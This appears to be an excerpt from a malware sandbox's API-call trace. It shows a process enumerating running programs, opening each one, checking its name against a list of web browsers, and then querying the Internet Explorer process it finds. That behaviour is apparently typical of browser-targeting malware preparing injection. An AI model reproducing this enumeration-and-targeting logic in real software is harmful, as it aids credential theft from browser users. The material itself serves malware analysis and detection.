	[0212.840] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.841] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3e98
	[0212.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.841] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.841] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.842] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.842] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.842] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0212.843] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3e9c
	[0212.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.843] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.844] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.844] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.845] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.845] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0212.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3ea0
	[0212.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.847] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0212.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.848] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.848] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0212.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.848] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.849] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.849] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3ea4
	[0212.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.850] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.850] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.850] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.851] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.851] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0212.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3ea8
	[0212.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.852] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0212.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.852] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.852] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0212.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.852] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.853] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0212.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3eac
	[0212.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.854] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0212.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.854] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.854] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0212.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.854] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.855] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0212.855] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3eb0
	[0212.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.855] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0212.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.856] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.856] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0212.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.856] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.856] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0212.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3eb4
	[0212.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.857] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0212.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.857] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.858] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0212.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.858] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.858] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0212.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0212.859] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0212.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3eb8
	[0212.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.860] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0212.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.860] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.861] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0212.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.862] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.863] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0212.864] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3ebc
	[0212.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.864] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0212.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.864] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.864] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0212.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.865] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.865] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0212.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3ec0
	[0212.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.866] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0212.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.866] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.866] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0212.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.867] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.867] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0212.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3ec4
	[0212.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.868] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0212.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.868] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.868] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0212.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.869] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.869] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0212.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3ec8
	[0212.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.870] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0212.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.871] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.871] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0212.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.872] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.872] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0212.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3ecc
	[0212.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.873] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0212.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.873] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.874] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0212.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.874] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.874] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0212.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3ed0
	[0212.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.875] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0212.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.875] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.876] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0212.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.876] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.876] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0212.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3ed4
	[0212.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.877] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0212.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.878] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.879] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0212.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.879] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.880] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0212.880] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3ed8
	[0212.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.881] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0212.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.881] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.881] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0212.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.881] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.881] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0212.882] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3edc
	[0212.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.882] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0212.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.882] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.883] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0212.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.883] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.883] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0212.884] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3ee0
	[0212.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.884] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0212.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.884] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.885] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0212.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.885] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.886] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0212.886] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3ee4
	[0212.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.886] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0212.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.887] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.888] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0212.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.888] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.889] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0212.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3ee8
	[0212.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.889] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0212.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.890] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.890] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0212.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.891] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.891] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0212.892] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3eec
	[0212.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.892] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0212.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.892] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.893] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0212.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.894] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.895] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0212.895] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3ef0
	[0212.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.895] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0212.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.896] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.896] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0212.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.897] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.897] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0212.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3ef4
	[0212.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.898] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0212.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.898] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0212.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.898] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0212.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.899] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.899] NtQueryInformationProcess (in: ProcessHandle=0x3ef4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
